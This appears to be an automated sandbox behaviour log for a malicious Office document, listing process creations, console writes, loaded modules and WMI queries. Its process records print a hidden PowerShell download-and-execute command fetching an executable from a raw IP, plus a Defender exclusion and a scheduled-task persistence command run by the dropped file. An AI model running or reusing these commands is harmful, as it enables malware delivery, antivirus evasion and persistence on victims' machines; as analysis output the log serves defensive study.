                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w...............B.2k....P%l...............W.............}..v............0.......................f.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................2k......................W.............}..v............0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......B.2k....P%l...............W.............}..v............0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................2k....H.................W.............}..v............0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E......................u2k......l...............W.............}..v....pO......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....(P................W.............}..v.....P......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v....8W......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k.....W................W.............}..v....pX......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.1.............}..v.....\......0.................l.....$.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8]................W.............}..v.....]......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....d......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8e................W.............}..v.....e......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....l......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....8m................W.............}..v.....m......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'...............l.....D.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....`s................W.............}..v.....s......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v.....z......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....`{................W.............}..v.....{......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v............0.................l.....&.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....0.......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................u2k......l...............W.............}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....0.......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................l.....<.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k....(.................W.............}..v............0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........u2k......l...............W.............}..v....8.......0.................l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v2k......................W.............}..v....p.......0...............8.l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k......................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...8.......0.................^.....6.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k......................W.............}..v....p.......0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v............0.................^.....".......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k....8.................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............v..k......^...............W.............}..v............0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k....8.................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............v..k......^...............W.............}..v............0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k....8.................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'...............^.....D.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k....`.................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............v..k......^...............W.............}..v............0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k....X.................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E.....w...............v..k......^...............W.............}..v............0.......................f.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k......................W.............}..v....H.......0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......v..k......^...............W.............}..v............0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......................W.............}..v............0...............H.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.E......................v.k......^...............W.............}..v.....R......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....pS................W.............}..v.....S......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....Z......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....8[................W.............}..v.....[......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.1.............}..v....._......0...............8.^.....$.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....`................W.............}..v.....a......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....g......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....h................W.............}..v.....i......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....o......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....p................W.............}..v.....q......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'.............8.^.....D.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....v................W.............}..v....(w......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v.....}......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k.....~................W.............}..v....(.......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....@.......0...............8.^.....&.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k......................W.............}..v....x.......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................v.k......^...............W.............}..v....@.......0...............................l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k......................W.............}..v....x.......0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............8.^.....<.......l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....p.................W.............}..v............0.................^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........v.k......^...............W.............}..v............0...............8.^.............l...............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................w.k....8.................W.............}..v............0.................^.............l...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....4...............T...............................0.......#.......................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....4...............T.......;.......................0.......#.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....4...............T.......w.......................0......./.......................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....4...............T...............................0......./.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....4...............P...............................0.......;...............|.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....4...............P...............................0.......;.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........|.....".......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....4...............P.......2.......................0.......G.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....4...............L.......].......................0.......S.......................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....4...............L.......x.......................0.......S.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......Z...e.x.e.P.....4...............L...............................0......._.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....4...............L...............................0......._.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....4...............P...............................0.......k.......................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....4...............L...............................0.......k.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........|.....2.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....4...............L.......N.......................0.......w.........|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............L.......y.......................0.......................l.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............P...............................0.................|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4...............L...............................0.................|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4...............L...............................0.................|.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................%.............h.%.....(.P.....$.......................3.................................................................!.....Jump to behavior
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMutant created: \Sessions\1\BaseNamedObjects\CVJFnsnVFoXysEkzODvWP
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: 14.0.taskmg.exe.400000.13.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.13.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.2.taskmg.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.2.taskmg.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
